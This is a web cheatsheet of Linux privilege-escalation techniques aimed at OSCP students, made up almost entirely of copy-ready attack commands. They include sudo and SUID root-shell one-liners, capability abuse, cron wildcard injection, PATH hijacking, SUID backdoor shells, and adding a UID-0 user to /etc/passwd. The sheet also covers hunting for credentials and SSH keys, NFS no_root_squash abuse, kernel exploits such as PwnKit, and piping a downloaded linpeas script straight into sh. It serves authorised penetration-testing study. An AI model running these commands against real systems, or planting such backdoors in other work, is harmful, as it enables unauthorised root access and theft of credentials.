Linux Privilege Escalation Cheatsheet 2026

80+ techniques to go from a low-privilege shell to root. Enumeration, sudo, SUID/SGID, capabilities, cron, PATH hijacking, kernel exploits and automated tools — the reference OSCP students bookmark.

Last updated:

New to pentesting? Read our complete beginner's guide to see where privilege escalation fits in the full methodology.

Quick Navigation

01 Enumeration 02 Sudo Rights 03 SUID / SGID 04 Capabilities 05 Cron Jobs 06 PATH Hijacking 07 Credentials & Files 08 NFS Root Squash 09 Kernel Exploits 10 Automated Tools

# Initial Enumeration

Privilege escalation is 90% enumeration. Gather context before touching any exploit — who you are, what you can run, and what the system looks like.

id && whoami && groups
Current user, UID/GID and group membership (look for adm, docker, lxd, disk)
uname -a; cat /etc/os-release
Kernel version and distribution — needed to match kernel exploits
sudo -l
List commands you can run as root — the single most important check
find / -perm -4000 -type f 2>/dev/null
Find all SUID binaries — cross-reference each with GTFOBins
getcap -r / 2>/dev/null
List files with Linux capabilities set
cat /etc/crontab; ls -la /etc/cron.*
Scheduled jobs — look for scripts running as root you can write to
ps aux | grep -i root
Processes running as root — potential exploitable services
netstat -tulpn 2>/dev/null || ss -tulpn
Internal services bound to localhost — often unprotected

# Sudo Exploitation

After sudo -l, cross-reference every allowed binary with GTFOBins. Many everyday tools spawn a root shell when run through sudo.

sudo vim -c ':!/bin/sh'
Root shell via vim if you can sudo vim
sudo find . -exec /bin/sh \; -quit
Root shell via find
sudo awk 'BEGIN {system("/bin/sh")}'
Root shell via awk
sudo env /bin/sh
Root shell via env
sudo -u#-1 /bin/bash
CVE-2019-14287 — bypass "ALL, !root" sudo restriction
💡 Tip: Check the sudo version: sudo --version. Versions < 1.9.5p2 are vulnerable to Baron Samedit (CVE-2021-3156), a heap overflow giving instant root.

# SUID / SGID Binaries

A SUID binary runs as its owner (often root) no matter who launches it. Enumerate, then exploit via GTFOBins' "SUID" section.

find / -perm -4000 -type f 2>/dev/null
All SUID binaries
find / -perm -2000 -type f 2>/dev/null
All SGID binaries
./bash -p
If bash has SUID: -p preserves privileges → root shell
find /tmp -exec /bin/sh -p \; -quit
Exploit SUID find to keep the privileged shell (-p)
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash
If you already have root: drop a SUID backdoor shell

# Linux Capabilities

Capabilities grant slices of root power to specific binaries. cap_setuid is the jackpot.

getcap -r / 2>/dev/null
Recursively list all files with capabilities
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
If python3 has cap_setuid+ep → instant root shell
/usr/bin/perl -e 'use POSIX qw(setuid); setuid(0); exec "/bin/sh";'
If perl has cap_setuid+ep → root shell

# Cron Jobs

Root-owned scheduled scripts that you can write to — or that use exploitable wildcards — are a classic path to root.

cat /etc/crontab; ls -la /etc/cron.d /etc/cron.daily
List system cron jobs and their scripts
grep -rl "" /etc/cron* 2>/dev/null | xargs ls -la 2>/dev/null
Check permissions on every cron script — is any world-writable?
echo 'cp /bin/bash /tmp/rb; chmod +s /tmp/rb' >> /path/to/writable_cron.sh
Inject a SUID backdoor into a writable root cron script
💡 Wildcard injection: A cron running tar czf backup.tar.gz * in a writable directory can be hijacked by creating files named like tar flags (e.g. --checkpoint-action=exec=sh rootshell.sh).

# PATH Hijacking

When a privileged program calls a command without an absolute path, you control which binary actually runs.

strings /path/to/suid_binary | grep -iE 'service|cp|cat|sh|system'
Find relative command calls inside a SUID binary
echo '/bin/bash -p' > /tmp/service; chmod +x /tmp/service
Create a malicious binary matching the called command name
export PATH=/tmp:$PATH; /path/to/suid_binary
Prepend your directory to PATH, then trigger the binary → your code runs as root

# Credentials & Sensitive Files

Hardcoded passwords, private keys and a writable /etc/passwd are found on more boxes than you'd think.

grep -rniE 'password|passwd|secret|api_key' /var/www /home /opt 2>/dev/null
Hunt for hardcoded credentials in config and source files
find / -name id_rsa 2>/dev/null; find / -name '*.kdbx' 2>/dev/null
Locate SSH private keys and KeePass databases
ls -l /etc/passwd
If /etc/passwd is writable → add a root user
openssl passwd -1 -salt x hacked
Generate a password hash to inject into /etc/passwd
echo 'root2:HASH:0:0:root:/root:/bin/bash' >> /etc/passwd; su root2
Add a UID 0 user with your known password, then switch to it
cat ~/.bash_history; sudo cat /var/mail/root 2>/dev/null
History files and mail spools often leak secrets

# NFS Root Squash Misconfiguration

An NFS share exported with no_root_squash lets you write files as root from a machine you control.

cat /etc/exports; showmount -e TARGET
List NFS exports — look for no_root_squash
mount -o rw TARGET:/share /mnt/nfs
Mount the vulnerable share from your attacker box (as root)
cp /bin/bash /mnt/nfs/rootbash; chmod +s /mnt/nfs/rootbash
Drop a SUID root shell into the share, then run it on the target

# Kernel Exploits (Last Resort)

Use these only after exhausting misconfiguration paths — they can crash the target. Always match the exact kernel from uname -r.

ExploitCVEAffected
DirtyPipeCVE-2022-0847Kernel 5.8 – 5.16.11
DirtyCowCVE-2016-5195Kernel 2.6.22 – 4.8.3
PwnKit (polkit)CVE-2021-4034Most distros pre-2022
Baron SameditCVE-2021-3156sudo < 1.9.5p2
searchsploit linux kernel $(uname -r | cut -d- -f1)
Find public exploits matching the running kernel
./PwnKit
PwnKit (CVE-2021-4034) — near-universal local root on unpatched systems

# Automated Enumeration Tools

Automate the boring parts — but understand every finding. On the OSCP exam, automated tools are limited, so manual skill matters.

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
LinPEAS — colour-coded privesc enumeration (run from memory, no disk write)
./linenum.sh -t
LinEnum — thorough classic enumeration script
./pspy64
pspy — watch processes and cron jobs in real time without root
python3 linux-exploit-suggester.py
Suggest kernel exploits based on the running version

❓ Linux Privilege Escalation FAQ

Enumerate everything. Start with id, sudo -l, uname -a and SUID discovery (find / -perm -4000). Automated tools like LinPEAS help, but manual enumeration is essential for the OSCP exam.

Run sudo -l and cross-reference each allowed binary with GTFOBins. Many binaries (vim, find, awk, python) spawn a root shell via sudo. Also check the sudo version for CVE-2021-3156.

A SUID binary runs with its owner's privileges (often root). Find them with find / -perm -4000 2>/dev/null, then check GTFOBins for that binary's SUID exploitation method.

Capabilities split root's power into fine-grained units. Find them with getcap -r / 2>/dev/null. Dangerous ones like cap_setuid on python or perl let you become root directly.

Check /etc/crontab for root scripts. If a scheduled script is writable, or uses a relative path or wildcard you control, you can inject commands that run as root.

If a SUID binary or cron script calls a command without an absolute path, place a malicious binary with that name earlier in $PATH. When root runs the program, your binary executes as root.

Only as a last resort — they can crash the target. Exhaust misconfiguration paths (sudo, SUID, cron) first, and match the exact kernel from uname -a before compiling any exploit.

LinPEAS is an automated enumeration script highlighting privesc vectors colour-coded by likelihood. Run ./linpeas.sh and review the red/yellow findings. It complements — not replaces — manual enumeration.

📚 Related Resources

AI-Assisted Pentest Report

Turn your privesc findings into a professional PDF report. AI auto-fills CVE, CVSS and severity.

Try for free →

Want all 12,020+ commands?

This privesc cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.

Start free →